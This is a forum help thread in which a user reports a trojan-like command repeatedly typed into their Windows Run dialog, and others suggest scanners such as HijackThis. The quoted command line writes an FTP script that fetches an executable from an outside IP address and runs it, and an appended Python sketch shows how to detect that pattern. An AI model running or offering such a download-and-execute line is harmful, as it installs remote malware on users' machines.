calvinnhobbes
Run window being auto populated by someone/thing else
Hello
I have a question: at random intervals the Run window from Start > Run pops up and starts populating with text that tries to do something.
This is the command line:
cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
I downloaded these anti-rootkit programs: Sophos Anti-Rootkit, RootkitRevealer and Novatix Cyberhawk.
The Sophos scan didn't find anything, and neither did Cyberhawk. I don't understand the RootkitRevealer log.
I do use VNC Viewer 4.1.
I also have Spyware Doctor, SpywareBlaster, Registry Mechanic and AVG AV with firewall.
Help would be very much appreciated.
What was the solution ultimately to your issue? Did Kaspersky detect this? If so, what was the name it came up with? I think this info can help others that are having these issues.
Thanks!
-rich
ASKER
Kaspersky didn't find anything, but I have done the upgrade from the free version to the professional version of VNC Viewer and the problem has gone. HijackThis didn't find anything either. I'm still afraid that the trojan or whatever is still in my system.
davide
So run something like HijackThis:
http://www.spywareinfo.com/~merijn/programs.php#hijackthis
And remove anything suspicious. Do this after upgrading VNC.
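
The command line quoted in the question builds an FTP script with echo redirects, runs ftp -n -s: on it, then launches the file the script fetched. As an added example (not part of the thread), this Python sketch flags that pattern in logged command lines; the function name and the sample line, which uses a documentation address and a placeholder file name, are constructed for illustration.

```python
import re

ECHO_RE = re.compile(r'^echo\s+(.*?)\s*(>>?)\s*(\S+)$', re.I)
FTP_RE = re.compile(r'^ftp(?:\.exe)?\b.*?-s:(\S+)', re.I)

# Constructed sample shaped like the command in the question (TEST-NET address).
SAMPLE = ('cmd.exe /c del i&echo open 192.0.2.10 2121 > i&echo user 1 1 >> i '
          '&echo get payload.exe >> i &echo quit >> i &ftp -n -s:i &payload.exe&del i&exit')

def analyze_cmdline(cmdline):
    """Return details if the line echoes an FTP script to a file and feeds it
    to ftp -s:, else None. Also records fetched files that are then executed."""
    body = re.sub(r'^\s*cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.I)
    files = {}       # file name -> lines written into it by echo redirects
    finding = None
    for part in (p.strip() for p in body.split('&')):
        if not part:
            continue
        m = ECHO_RE.match(part)
        if m:
            text, op, name = m.groups()
            if op == '>':                    # '>' truncates, '>>' appends
                files[name.lower()] = []
            files.setdefault(name.lower(), []).append(text)
            continue
        m = FTP_RE.match(part)
        if m and m.group(1).lower() in files:
            finding = {'script_file': m.group(1), 'server': None,
                       'downloads': [], 'executed': []}
            for line in files[m.group(1).lower()]:
                words = line.split()
                if len(words) < 2:
                    continue
                verb = words[0].lower()
                if verb == 'open':
                    finding['server'] = ' '.join(words[1:3])  # host and port
                elif verb in ('get', 'mget', 'recv'):
                    finding['downloads'].append(words[1])
            continue
        # After the ftp step, a downloaded name used as a command is the launch.
        first = part.split()[0].lower()
        if finding and first in (d.lower() for d in finding['downloads']):
            finding['executed'].append(first)
    return finding

if __name__ == '__main__':
    print(analyze_cmdline(SAMPLE))
```

A non-empty `executed` list is the strongest signal: the same one-liner both fetched a file and ran it.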